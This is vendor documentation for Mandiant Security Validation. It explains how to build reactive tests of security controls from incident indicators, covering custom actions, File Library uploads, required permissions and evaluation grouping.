Mandiant Security Validation (MSV) is an automated and continuous approach to testing the efficacy of an organization's security controls against cyber threats. Security Validation is informed by timely threat intelligence and executes automated and continuous testing of security controls with the use of real attacks.

Effective security requires more than just implementing controls. Understanding their real-world effectiveness is crucial for protecting your organization from cyber threats. Mandiant Security Validation tackles this challenge by providing a comprehensive solution to test and evaluate your security posture.

Reactive Testing allows you to assess your security posture as it relates to recent events that may have occurred in your environment. Findings from any incident response can be used to create custom actions within MSV. These custom actions can then be used to validate your security controls are able to prevent, detect, and alert against these indicators in the future. The Validation Research Team (VRT) also creates headline content from incidents and vulnerabilities. Released content can be found here on the documentation portal.

Implementing Reactive Testing

You should use the Action Library first to ensure MSV doesn't already have the action you're looking for before creating a custom action. We've included some guidelines below to help you create your own reactive testing actions and evaluation.

• Identify the indicators you have around the incident. These could include but are not limited to commands, files, domains, pcaps, URLs, emails, and cloud resources.
• Any files that will be used in Host CLI actions must first be uploaded to the File Library. To do this, navigate to Library > File Library and select Upload File. Ensure to set the file restrictions for any file that is malicious or destructive in nature.
• In order to create a custom action, you must have the following permissions set for your account. User permissions can be updated by going to Settings > User Settings and selecting Edit for a particular user. 
  • Approve Cloud Actions
  • Approve Endpoint Actions
  • Approve on Action Creation
  • Approve File Library Restrictions
• To create a custom action, navigate to Library > Actions and select Add Action. From here, you can select the type of custom action that is desired. Your organization needs to be licensed for Captive IOC and Cloud Validation Module in order to create and run these types of actions.
• Captive IOC actions do require additional configuration and setup. Please see our documentation on how to get started. 
• The actions in your reactive evaluation should be grouped into actions of 20-30 actions per group. This best practice will ensure your baseline evaluation is performant and not overwhelming the Director or Actors during runtime.

As opposed to baseline testing where evaluations are scheduled on a recurring basis (weekly, monthly, quarterly), reactive testing should be done until the actions are remediated. As these actions typically represent an incident that has occurred in your environment, identifying gaps and remediation steps are critical.